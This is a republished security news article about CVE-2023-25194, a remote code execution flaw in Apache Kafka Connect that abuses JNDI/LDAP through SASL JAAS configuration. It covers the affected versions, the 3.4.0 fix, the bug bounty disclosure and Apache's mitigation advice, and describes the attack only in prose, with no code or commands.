Cyber Security

Remote code execution flaw patched in Apache Kafka

Apache has resolved a vulnerability potentially exploitable to launch remote code execution (RCE) attacks using Kafka Connect.

Announced on February 8, the critical vulnerability is tracked as CVE-2023-25194. It was discovered in Apache Kafka Connect, a free, open source component of Apache Kafka that operates as a central hub for data integration between systems, databases, and key-value stores.

Apache claims that more than 80% of Fortune 100 organizations use the Kafka platform, including approximately seven out of every 10 banks.

According to Apache’s mailing list note, the security flaw was discovered by bug bounty hunter Jari Jääskelä, who reported the issue via Aiven’s HackerOne bug bounty program.

The vulnerability can only be triggered when there is access to a Kafka Connect worker – a logical work unit component – and the user must also be able to create or modify worker connectors with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol.

Log4Shell connection

The vulnerability involves the Lightweight Directory Access Protocol (LDAP) and Java Naming and Directory Interface (JNDI) endpoints, as was the case with ‘Log4Shell’, the landmark vulnerability discovered in ubiquitous Java logging library Apache Log4j in 2021. JNDI is also involved in another, newly disclosed critical vulnerability in Apache Sling JCR Base.

With the Kafka bug, an authenticated attacker could configure a specific connector property via either the Aiven API or the Kafka Connect REST API, forcing a worker to connect to an attacker-controlled LDAP server.

“The server will connect to the attacker’s LDAP server and it deserializes the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka Connect server,” the advisory reads. “Attacker[s] can execute commands on the server and access other resources on the network.”

When each prerequisite exists, Apache says it would be possible to perform JNDI requests, potentially leading to the execution of remote code or denial-of-service attacks.

Disclosure

The report was first submitted to Aiven via the organization’s bug bounty program on April 4, 2022. Triage took place in May and Jääskelä was awarded a $5,000 reward for their efforts before the issue was fixed and publicly disclosed.

Apache Kafka versions 2.3.0-3.3.2 were impacted, and the vulnerability was fixed in version 3.4.0.

The organization notes that since Kafka 3.0.0, users have been able to specify the connector configuration properties used in the attack chain. A new property has been added that disables problematic login module usage in the SASL JAAS configuration in version 3.4.0, alongside additional security measures.

Apache said: “We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also, examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation.”

Jääskelä also submitted a second critical vulnerability report concerning Apache Kafka in the same month.

The Aiven JDBC sink, including the SQLite JDBC driver, could be abused with an unprotected Jolokia bridge to execute RCE on Kafka Connect servers. The bug bounty hunter was awarded $5,000 for this report, and the security issue has since been resolved.

Advertisement. Scroll to continue reading.

The Daily Swig has reached out to the Apache project and we will update this story as and when we hear back.

Copyright 2021 Associated Press. All rights reserved.

Source: https://portswigger.net/daily-swig/remote-code-execution-flaw-patched-in-apache-kafka

Click to comment

You May Also Like

Cyber Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies three weeks to secure Adobe ColdFusion servers on their networks against two...

Cyber Security

Businesses and developers are focusing more on the security of applications in their digital environment as cyber threats and data breaches continue escalating. The...

Cyber Security

HCL BigFix is an endpoint management platform that has the capability to automate discovery, management, and remediation. It can find and fix vulnerabilities on...

Cyber Security

The Environmental Protection Agency cited a lack of resources and the sheer volume of critical vulnerabilities as the reasons for its inability to patch...

Copyright © 2023 Newsworthy News | Global | Political | Local | All News | Website By: Top Search SEO

Exit mobile version